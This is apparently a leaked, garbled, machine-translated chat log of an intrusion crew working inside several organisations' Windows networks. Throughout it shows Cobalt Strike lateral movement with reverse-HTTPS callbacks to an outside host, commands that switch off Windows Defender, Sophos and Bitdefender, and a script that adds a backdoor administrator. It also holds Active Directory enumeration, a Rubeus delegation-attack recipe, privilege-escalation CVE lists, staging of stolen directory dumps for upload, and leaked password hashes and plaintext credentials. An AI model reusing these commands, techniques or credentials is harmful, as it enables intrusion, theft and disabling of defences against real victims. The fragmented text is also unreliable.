Microsoft Windows Network OK F: \TLCEPICDB01.loomisco.com\c$ Microsoft Windows Network OK G: \TLCEPICDB01.loomisco.com\e$ Microsoft Windows Network OK H: \TLCEPICDB01.loomisco.com\f$ Microsoft Windows Network OK I: \TLCSQLDB1.loomisco.com\c$ Microsoft Windows Network OK J: \TLCSQLDB1.loomisco.com\e$ Microsoft Windows Network OK L: \TLCSQLDB1.loomisco.com\f$ Microsoft Windows Network OK M: \TLCEPICIIS1.loomisco.com\c$ Microsoft Windows Network The command completed successfully. 
``We end up with something like this beacon> shell wmic /node:loomiswebsrv4 logicaldisk get caption [*] Tasked beacon to run: wmic /node:loomiswebsrv4 logicaldisk get caption [+] host called home, sent: 79 bytes [+] received output: Caption C: D: E: F: G: beacon> shell wmic /node:loomisgw2 logicaldisk get caption [*] Tasked beacon to run: wmic /node:loomisgw2 logicaldisk get caption [+] host called home, sent: 75 bytes [+] received output: Caption C: D: E: ``Anytime I try to upload a file''. You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747 0 file(s) copied. ``Errors like this`` beacon> jump psexec 10.10.10.5 pipe [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_9072) on 10.10.10.5 via Service Control Manager (\\10.10.10.5\ADMIN$\c316488.exe) [+] host called home, sent: 287849 bytes [-] could not upload file: 384 [-] Could not open service control manager on 10.10.10.5: 1722 [-] Could not connect to pipe: 384 beacon> jump psexec loomiswebsrv4 pipe [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_9072) on loomiswebsrv4 via Service Control Manager (\loomiswebsrv4\ADMIN$\7261303.exe) [+] host called home, sent: 285742 bytes [-] could not upload file: 384 [+] host called home, sent: 2122 bytes [-] Could not open service control manager on loomiswebsrv4: 1722 [-] Could not connect to pipe: 384 To find out all logical drives on these hosts where the file does not start do the following shell wmic logicaldisk get caption`` Application Server: TLCEPICAS01.loomisco.com + Web DB: loomisgwdb2.loomisco.com + File Server: TLCStorage1.loomisco.com + ScanStorage.loomisco.com + EobStorage.loomisco.com + Wyomissing_Ex1.loomisco.com + STORAGE.loomisco.com + FAX Server: LOOMISFAXR02.loomisco.com + 
LOOMISFAXR01.loomisco.com - Print Server: Printsrv16.loomisco.com + Printsrv08.loomisco.com + Finance: FSITrack.loomisco.com + Web Server: TLCWebP2.loomisco.com + loomiswebsrv4.loomisco.com - TLCWEBT1.loomisco.com + TLCWEBP1.loomisco.com + loomisgw2.loomisco.com - Utility Server: TLCMONITORING.loomisco.com + TLCSophos.loomisco.com + VMs: WebChat.loomisco.com + Metafile-vm1.loomisco.com + LOOMISGT2.loomisco.com + HCL Sametime: (HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration) LDSWYO21.loomisco.com + Bitvise SSH Server; DHCP: TLCSKLM2.loomisco.com + Applied Epic (Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace) EpicAPM.loomisco.com + TLCEPICCS01.loomisco.com + ``Well, I'm married there. I need it for nowFAXR01 do not touchLOOMISFAXR01 on what? 1) I am on the current machine from where the session to run too? 
through the letter so we do the following - leave all sessions on these servers open to make sure the processes occupied by the other files are dead before running the file (manually just kill them) - Mount all logical drives of these 4 servers on one "own" serverDisassemble it makes no sense in fact, there may be two reasons for this 1) avera policies haven't been updated (since we haven't uninstall the agent itself, it keeps working on its own policies explicitly assigned to these hosts) 2) vindefi is a fierce windup, there are 4 hosts where the file is being pulled down because of some "special" settings avera only 2 out of 30 servers did not start via jump but started later via dll loading of stager and wmic at the moment manual work + the rest on their list go through everything is ready You don't need to touch them. I took these from your list and put them to work Application Server: TLCEPICAS01.loomisco.com Web DB: loomisgwdb2.loomisco.com + File Server: TLCStorage1.loomisco.com + ScanStorage.loomisco.com + EobStorage.loomisco.com + Wyomissing_Ex1.loomisco.com + STORAGE.loomisco.com + ``Go to the bottom again + on pvsh you amsi works not psexec- don't open it``` Application Server: TLCEPICAS01.loomisco.com Web DB: loomisgwdb2.loomisco.com File Server: TLCStorage1.loomisco.com ScanStorage.loomisco.com EobStorage.loomisco.com + Wyomissing_Ex1.loomisco.com - STORAGE.loomisco.com -. 
FAX Server: LOOMISFAXR02.loomisco.com - LOOMISFAXR01.loomisco.com - Print Server: Printsrv16.loomisco.com - Printsrv08.loomisco.com + Finance: FSITrack.loomisco.com Web Server: TLCWebP2.loomisco.com - loomiswebsrv4.loomisco.com - TLCWEBT1.loomisco.com - TLCWEBP1.loomisco.com - loomisgw2.loomisco.com - Utility Server: TLCMONITORING.loomisco.com + TLCSophos.loomisco.com VMs: WebChat.loomisco.com + Metafile-vm1.loomisco.com - LOOMISGT2.loomisco.com + HCL Sametime: (HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration) LDSWYO21.loomisco.com - Bitvise SSH Server; DHCP: TLCSKLM2.loomisco.com - Applied Epic (Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace) EpicAPM.loomisco.com + TLCEPICCS01.loomisco.com - ``Yeah, bottoms up, you went from the bottom of the list, right? I'm taking these to work, okay? 
``` Application Server: TLCEPICAS01.loomisco.com Web DB: loomisgwdb2.loomisco.com File Server: TLCStorage1.loomisco.com ScanStorage.loomisco.com EobStorage.loomisco.com Wyomissing_Ex1.loomisco.com STORAGE.loomisco.com ``consider that no one has heard it)`` I get it, my token is not setenen read)))))) there will always be a percentage of machines where you can not jump because either a ban on running the service is or hz all jumps work through the service it then need to open the file and go on skip this, put a mark if you paid attention you can not open the service does not want to open beacon> jump psexec_psh loomisgw2.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomisgw2.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 7825 bytes [-] Could not open service control manager on loomisgw2.loomisco.com: 1722 [+] host called home, sent: 206472 bytes [-] Could not connect to pipe (\loomisgw2.loomisco.com\pipe\status_9072): 384 beacon> jump psexec_psh TLCWEBT1.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCWEBT1.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 7824 bytes [-] Could not open service control manager on TLCWEBT1.loomisco.com: 5 [+] host called home, sent: 206454 bytes [-] Could not connect to pipe (\TLCWEBT1.loomisco.com\pipe\status_9072): 2 beacon> jump psexec_psh loomiswebsrv4.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on loomiswebsrv4.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 7829 bytes [-] Could not open service control manager on loomiswebsrv4.loomisco.com: 1722 [+] host called home, sent: 206474 bytes [-] Could not connect to pipe (\loomiswebsrv4.loomisco.com\pipe\status_9072): 384 ``Did you do it without forcing the GPO policies require up to an hour and a half do it if not, you did not do it there was 
this item? did you do everything according to the instructions@tl1 did you force the gpoapdate? skip this for now, we can bypass it in a slightly different way at the end``` beacon> shell def.bat [*] Tasked beacon to run: def.bat [+] host called home, sent: 38 bytes [+] received output: C:\Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f ERROR: Access is denied. C:{Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:{Windows\ /t reg_dword /d 0 /f ERROR: Access is denied. C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f ERROR: Access is denied. C:{Windows\system32>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f The operation completed successfully. C:\Windows\system32>powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows Add-MpPreference : The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows + ~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co mmandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException C:{Windows\system32>sc config WinDefend start= disabled [SC] OpenService FAILED 5: Access is denied. C:\Windows\system32>sc stop WinDefend [SC] OpenService FAILED 5: Access is denied. C:{Windows\system32>powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference : The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 
At line:1 char:1 + Set-MpPreference -DisableRealtimeMonitoring $true. + ~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co mmandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException ``And here's a protected registry hive, and this is a + - knocks out Defender``. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f powershell.exe /c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows sc config WinDefend start= disabled sc stop WinDefend powershell.exe -exec Bypass /c Set-MpPreference -DisableRealtimeMonitoring $true Now the problems have started, which can only be "caught" by manual control. TLCEPICIIS1 - the file is cut by an aver on startup, which one - vindef or sofos is not clear because both PIDs are present and for this in any case better to run manually ie, change the date on all files in the root of the disk the most important thing to check manually that the file works ud and there are many alternatives batch run it via psekzek remote eczekUЪ because I left it on my list I don't see dk in the list))) you can do it in a hundred other ways - but here it is quite convenient and so because the network is small I load on each) I am not lazy) a few clicks do not touch the dk till the end.I top down this is your servers bottom up move down the list or upload to each? 
Application Server: TLCEPICAS01.loomisco.com Web DB: loomisgwdb2.loomisco.com File Server: TLCStorage1.loomisco.com ScanStorage.loomisco.com EobStorage.loomisco.com Wyomissing_Ex1.loomisco.com STORAGE.loomisco.com FAX Server: LOOMISFAXR02.loomisco.com LOOMISFAXR01.loomisco.com Print Server: Printsrv16.loomisco.com Printsrv08.loomisco.com Finance: FSITrack.loomisco.com Web Server: TLCWebP2.loomisco.com loomiswebsrv4.loomisco.com TLCWEBT1.loomisco.com TLCWEBP1.loomisco.com loomisgw2.loomisco.com Utility Server: TLCMONITORING.loomisco.com. TLCSophos.loomisco.com VMs: WebChat.loomisco.com Metafile-vm1.loomisco.com LOOMISGT2.loomisco.com HCL Sametime: (HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration) LDSWYO21.loomisco.com Bitvise SSH Server; DHCP: TLCSKLM2.loomisco.com Applied Epic (Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace) EpicAPM.loomisco.com TLCEPICCS01.loomisco.com where is the executable where you can run it from where? I'm running the executable while I'm going through an open session in the list of servers so that's it, there's nothing interesting)) this should not stop you 3 is only 3 times more than 1 Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender ``there's no simple windows defenderThat's different from the guide because you have to disable it where there's no sofos agentTurn it off quietly Or touch it? I mean don't touch windef? 
lol) thank fuck dad for these 21st century black sessions5 sessions in less than a minute beacon> jump psexec_psh TLCBENTS02.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS02.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 214286 bytes [+] received output: Started service 2c89d98 on TLCBENTS02.loomisco.com beacon> jump psexec_psh TLCBENTS01.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCBENTS01.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 214293 bytes [+] received output: Started service 3a753bc on TLCBENTS01.loomisco.com beacon> jump psexec_psh TLCRDSLIC1.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCRDSLIC1.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 214302 bytes [+] received output: Started service 5db0202 on TLCRDSLIC1.loomisco.com beacon> jump psexec_psh TLCEPICTS02.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS02.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 214296 bytes [+] received output: Started service 6e0d775 on TLCEPICTS02.loomisco.com beacon> jump psexec_psh TLCEPICTS01.loomisco.com https [*] Tasked beacon to run windows/beacon_https/reverse_https (landcook.com:443) on TLCEPICTS01.loomisco.com via Service Control Manager (PSH) [+] host called home, sent: 214300 bytes [+] received output: Started service cdbd232 on TLCEPICTS01.loomisco.com ``However, vindex didn't start on those servers where the agent is cut off, we just cut it off and now we're showing the focus. since we haven't deleted the agent we're live showing.... I'm about beacon > ssreenhoto disconnect vindef by GPOhttp://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/рдпты see the line at the bottom? 
it looks like the line of cobalt? you know where the start menu and so on)and see how the policies are applied respectively? this screenshot from cobalt or rd if it looks so now turn off sofos through the console by adding new policy and update agents then we'll chop windefender via GPO policy right away, let's go, we'll get started - you help if you need to while we started this one - get the helpathome + i tuta i don't see among the files ad_users the wrong place winfender log cleaned up, and i also tried through PS but nothing worked from scriptov to arma?[ ](https://mediaeveryone.com/group/oasispetroleum-com?msg=WjC8jA9pp3cGTSPik) vtotpishee here the last message that was done so far and what the problem) aazaley files by the way yesterday AD did not fill up here when picked up)) vindef and I like to think i already found there kakoy edr product?while put in suspended I will give a new accessthat I'm at a standstill, I can not raise the rights, I tried all sorts of pull in the cobu that it would spin, no luck, and as for eleveit kita none of this does not work (I do not knowkakzakriptovat) then the session in slipnetut trusts are there?+ready after the launch, write back + now I'll give you the buildd if the fix then yes[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=YCqw2iCZWFzgipPg7) what are you talking about? find a place on the server fix it very well here? $krb5tgs$23$*sqladmin$ballymoregroup.local ballymore2015 ``stupidly-a. they didn't give away any of the downloaded options. i would throw here if there were kerbs unbrushed for a week? + flew in 20 minutes @user4 will be clean not especially if you do not count that flew in 30+ sessions left then clean who coba cleaner? 1let me load Friday's sessions disappearedthere's not much useful information about accesses. i've downloaded a six gig backup here. 
have you looked up and down the iMicrosoft mail here?the root/pass combination does not seem to occur at all, and in the mail it was said that the nimbles are associated with the active directory, tried the DA and the IT guys, tried their passwords with the root, with the admin, does not pass it was a year ago, if memory serves me right, so it's more likely they changed something there after the last command if there are any nix machines with root passwords or did you check them for nimbles also? - the ones that were already in the works +ElevateKitnetta)lpe is - Local Privilege Escalation ?Did you check the lpe? 
CVE-2015-2546 CVE-2016-3309 CVE-2017-0101 CVE-2018-8120 CVE-2019-1458 CVE-2020-0796 ``` trying to figure out the exploits, I think they'll fitzlalilsexploit, fill up the rubus and remove the kerbscrewsscale me when you pick it up I'll delete it https://wideio.com/UWaHAGCE3ysxyInTF4bOqTShHpypftKMWQKJ0ZcK/ad.7z ``secmplease let me give it to you ado delete all files, tell me how you'll do it, put file 6 and archive it`` cmd /c 7za a ad.7z ad_computers.txt ad_group.txt ad_ous.txt ad_subnets.txt ad_users.txt you know, now? where is 6:not enough files if you wrap a bunch then there is just a comma separated list without any quotes ?ok i'll pour you 7 tell me how you did upload you adfindshe now upload you there is unlikely to let no LA You do not have systems noticed there is a folder domain admin in the folder usernet, i upload or deadick upload tool and then run in this tool ? and how do I pour the addfynd ? C:\temp OAPVDI17 @ OASISPETR\bmolinaro net localgroup "Administrators" Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator oasis_admin OASISPETR\Domain Admins OASISPETR\ryoung OASISPETR\SCOM 2012 Administrators The command completed successfully. 00:00.0140 C:\temp OAPVDI17 @ OASISPETR\bmolinaro net group "Domain Admins" /dom The request will be processed at a domain controller for domain Oasispetr.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator buadmin camador_admin dpeterson_admin jdehuma_admin jedmond_admin ptran_admin ryoung_admin The command completed successfully. 00:00.0273 C:\temp OAPVDI17 @ OASISPETR\bmolinaro net group "Enterprise Admins" /dom The request will be processed at a domain controller for domain Oasispetr.com. 
Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator buadmin camador_admin dpeterson_admin jdehuma_admin jedmond_admin ptran_admin ryoung_admin The command completed successfully. `````` user7:QnQnUKIIGIlqeZzisFpexTu92easVI7lyY8 user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH - valid? https://wideio.com/iZsHDvbmvbXLZ8tAeyrT7HbWkZS6Ll40TXCUfJL0 `````` user7:9rczctBY0p4wbKRPIsXqb8hcLY29VhrzDjH ``Okay congratulations, I'll give you a new tule, while you work from it and wait for feedback that you did not pick up?`` Did not come? 100% must be because I was thrown out? +x64? apparently not registered as edrf only vindef....`` displayName=Windows Defender ``I'm not asking for the shellcode of your koba, give me the x64 shellcode, then don't say anything. net localgroup "administrators" Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator oasis_admin OASISPETR\Domain Admins OASISPETR\ryoung OASISPETR\SCOM 2012 Administrators The command completed successfully. If your session is up, maybe I should just change the cobo? 
OleMainThreadWndName mstsc.exe 6064 Console 3 27,724 K Running OASISPETR\bmolinaro 0:00:01 Remote Desktop Connection taskhostw.exe 13376 Services 0 17,012 K Unknown N/A 0:00:00 N/A svchost.exe 12452 Services 0 82,648 K Unknown N/A 0:03:08 N/A sppsvc.exe 7804 Services 0 11,756 K Unknown N/A 0:00:11 N/A svchost.exe 10372 Services 0 22,744 K Unknown N/A 0:02:01 N/A svchost.exe 11076 Services 0 7,560 K Unknown N/A 0:00:00 N/A mstsc.exe 12112 Console 3 27,836 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection mstsc.exe 6340 Console 3 27,528 K Running OASISPETR\bmolinaro 0:00:00 Remote Desktop Connection powershell.exe 8820 Console 3 78,588 K Running OASISPETR\bmolinaro 0:00:01 OleMainThreadWndName MpCmdRun.exe 11944 Services 0 13,808 K Unknown N/A 0:00:00 N/A svchost.exe 8492 Services 0 11,052 K Unknown N/A 0:00:00 N/A smartscreen.exe 3808 Console 3 24,536 K Running OASISPETR\bmolinaro 0:00:00 OleMainThreadWndName cmd.exe 6768 Console 3 7,460 K Running OASISPETR\bmolinaro 0:00:00 Command Prompt conhost.exe 5504 Console 3 22,348 K Running OASISPETR\bmolinaro 0:00:00 N/A tasklist.exe 6508 Console 3 11,592 K Unknown OASISPETR\bmolinaro 0:00:00 N/A `````` At line:1 char:1 + <# + ~~ This script contains malicious content and has been blocked by your antivirus software. ``I think it's blocking the conect@tl1 lwm bilder dlloc try, it fudne understand that ?versionlvm try it will be worse if you try with the old cryptor ?removeagajdin what ? waiting now redenier32 is 64 bit dll ? give the dll to work ?i can see it, put this command to cmd have access all the same ?rdp, vntz and so on start somerp, powershell, cmd, execute and so on what do you mean ?believe what analogues run ? any suggestions how to raise the session ?rdp also can not two whining(by hell) from the list have this port ? 
CORPKIOINTSQLP.CORP.TELEVISA.COM.MX 10.7.6.186:2717 ``from a scan point may be closed, in one MSSQLSvc/CORPKIOBDD101.corp.televisa.com.mx:2717 in the others no + this port is closed port in spn? from hell ``` CORPKIOSQLVS02.CORP.TELEVISA.COM.MX CORPKIOINTSQLP.CORP.TELEVISA.COM.MX CORPKIOCRMSQLD.CORP.TELEVISA.COM.MX CORPSFEDSQLD.CORP.TELEVISA.COM.MX CORPSFEDSQLP.CORP.TELEVISA.COM.MX ADMIN_SQL@FILIAL.TELEVISA.COM.MX CORPKIOSHPSQLP.CORP.TELEVISA.COM.MX CORPKIONCSQL02.CORP.TELEVISA.COM.MX CORPKIONCSQL01.CORP.TELEVISA.COM.MX CORPKIONCSQL03.CORP.TELEVISA.COM.MX ``Is there any way we can still find out what port the skull is running on if ladon and msf don't give out anything on the skull? they have custom ports on the skull on one server it's on port 50101 and the other servers are closed `CORP\ctxdbadmin 7106c947d3a8abbea16cb5448f4ac00a` they have `Administrator` on some machines and `Administrador` on others, most likely yes in the main domain almost everything is in English)may be they have international dialectic only need to learn) kek100% YES is to go to work in this company admin))it all gives a chancedano check skulia even in one half may be one LA, the second other LA yes, it is worth a try but the chances are, of course, 50\50 because little overlap LA, conventionally in one group of servers one LA and eventually expand the network will find the other pool of servers with this group LA can be hashdump polzak from this group can have local admins from the group that you have not seen before)`` CORPKIOBDD101\sqladmin:::2d593a1a330c2649716df558a5912ceb::: ``no, but does that do us any good? there are a couple of whines where there is access, but the admins are sitting right on a limited number of cars, including dk and whines among them no you skul servaks brute force? or check the anonymous entrance? but from the classics ``you abuzilal genericall right? didn't you abusive genericall rights? 
``` Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account: New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account: $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid We now need to build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case: Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} We can then use Rubeus to hash the plaintext password into its RC4_HMAC form: Rubeus.exe hash /password:Summer2018! And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER: Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB68393941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt ``` there is a user who has these permissions on the dk, or rather even a whole group, only I don't really understand how it works. 
We add a machine account, sort of replace the original? That is, we reset the password from the machine account, and since it is dk, the network will fall. Pinging filialeadc01.filial.televisa.com.mx [10.30.17.24] with 32 bytes of data: Reply from 10.30.17.24: bytes=32 time=67ms TTL=122 Ping statistics for 10.30.17.24: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 67ms, Maximum = 67ms, Average = 67ms beacon> portscan 10.30.17.24 445 none [*] Tasked beacon to scan ports 445 on 10.30.17.24 [+] host called home, sent: 93285 bytes [+] received output: 10.30.17.24:445 ``+CORPKLHLQRD01 - pass``demosave.com``FILIAL\Ivargasv 2d0a7cb1ea602f59dc9c7ee5bd11597b` valid`FILIAL\jcgarciae TVSAcrm8888!Valid with user1poka all are busy, reserve for us) appeared fresh in the work grid, if anyone idle - beep in pm please where you pass + + others who are without tasks now - write, do not keep silent, on you chetu on then i got it right - two interfaces on the touchceno also from chetu by the looks of on chetu just there, i move sideways and then the session came but the ip is different now run if you do not have session thrown me chetu? hello there. everything. sait i got it back khanypot it's definitely averm i think it's aB`threattest.edgewave.com i don't have a live one yet, who has sessions left elsewhere ?on regbest.com should be coming soon session from chetu.com - tell me how it will arrive in .binverno-10 minutes now will be ready paiload - i will make all hello, we need dllk segonday for bouncing, right? 
``` 172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN) [+] received output: 172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN) [+] received output: 172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN) [+] received output: 172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN) [+] received output: 172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN) [+] received output: 172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN) [+] received output: 172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN) [+] received output: 172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN) [+] received output: 172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN) [+] received output: 172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN) Scanner module is complete The kerb would be very helpful ... looking for a grid really big, oushek trash.on this, apparently, and no addinskih kreds.`` @ECHO OFF net user LEADMIN Deere0419! 
/add net localgroup Administrators LEADMIN /add WMIC USERACCOUNT WHERE Name='LEADMIN' SET PasswordExpires=FALSE ``He found a script, I think with his help, they administered polzakowest little admin, apparently a local net division I checked - active or the account off or a real blank password if it does not contradict the policies of the addpost because it can not access the real hashdump question: how can it happen that hashdump shows a blank password for the dude who has the account is active?the neighbors have come back hogeys no voodoo it's not generalsessions and stuff clean up files as you can optionally set ignores and scans off of course there's no offsets there Using command linehttps://www.bitdefender.co.th/wp-content/uploads/gz/Bitdefender_EndpointSecurityToolsForWindows_UsersGuide_enUS.pdfhttps://www.wilderssecurity.com/threads/bitdefender-free-edition-service-start-stop-script.245247/ ``` net start XCOMM sc config XCOMM start= auto net start bdss sc config bdss start= auto net start VSSERV sc config VSSERV start= auto net start LIVESRV sc config LIVESRV start= auto "C:\Program Files\Softwin\BitDefender10\bdmcon.exe" net stop LIVESRV sc config LIVESRV start= demand net stop VSSERV sc config VSSERV start= demand net stop bdss sc config bdss start= demand net stop XCOMM sc config XCOMM start= demand ``Send it to the forum and let it sit there. https://codeby.net/threads/antivirusy-v-nokaut.60706/моих no there are no files in the system32 no old ones, surely they are not in the system32 not mine, and I have not left anywhere else) and also? allzona in the folder zabix, and the rest in the system32 dns where were they?) yes old files removed? already clean up the codeyda files all? thanks excellent + I am talking about files do not forget to clean up after themselves you by the way at this rate in the system will shit all over the wild no it is ok ` `? 
User7[GEORDI]Administrator */4692|2020Dec07 19:46:30> shell wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt" [*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c cd C:\zabbix_agent for /f %a in (C:\zabbix_agent\AllZones.txt) do dnscmd.exe /ZoneExport %a %a.txt" [+] host called home, sent: 175 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 7116; ReturnValue = 0; }; ``` but there's a problem with the second command, it doesn't output the dnsyd file) `` `` User7[GEORDI]Administrator */4692|2020Dec07 19:38:31> shell wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt" [*] Tasked beacon to run: wmic /node:DATA3 process call create "cmd /c dnscmd.exe /enumzones > C:\zabbix_agent\AllZones.txt" [+] host called home, sent: 129 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 2576; ReturnValue = 0; }; ``Tool is in place, so everything is ok maybe remove the blank spaces from the > sign, if there is then it is the wrong way to run it check in system32 the utility file is not in the directory in short it did not work`sisd.k12\ExchAdmin f461d17330cadafe07025e2252256eda52a` under these creeds did not even copy it there for some reason... I don't see what the problem is with this)‖dll starts,‖ which means you somehow execute commands and you have mapping there.‖ Nowdll starts but no session arrives. User7 will come to him for details I think you have a way to start or not knocking?[ ](https://mediaeveryone.com/group/sisd-net?msg=zxeqyR78o3vFDDKu) do not come up i.e. there is no way to control? and stask? wmi disabled I'm waiting for the day I think you know the answer you need a session to work on a remote host? 
how kids already want to scoldbozhej jump on them did not work, I now try through sharpsbeck dns where?no, everything is correct - not rising and the sessions now let's try again, i screwed up like that just tell me what's with dhc01 with dhcp role it can be in this network dhcp servers are called dhcp1 and dhcp2 now to the question of sessions on dhcp I did not read the messages above nudhcp and dhcp for the guys the same thing?dhcp1 and dhcp2) now the session is dhcp1 and dhcp2. dhcp does not work with dhcp I do not know how it works with you at all forget about the jump on them dll not copy, jump also does not work they just dhcp called dhcp, dnsa why dhcp you? 3 servers can not jump to dhcp static Windows IP Configuration Host Name . . . . . .: SchoolBooks Primary Dns Suffix . . . . : admin.sisd.k12 Node Type . . . . .: Hybrid IP Routing Enabled. . . . : No WINS Proxy Enabled. .: No DNS Suffix Search List. .: admin.sisd.k12 sisd.k12 Ethernet adapter Ethernet: Connection-specific DNS Suffix : Description . . . . . . .: Microsoft Hyper-V Network Adapter. Physical Address . . . . .: 00-15-5D-01-DF-19 DHCP Enabled . . . . .: No Autoconfiguration Enabled . .: Yes Link-local IPv6 Address . : fe80::740f:5d54:8746:1b6d%6(Preferred) IPv4 Address . . . . .: 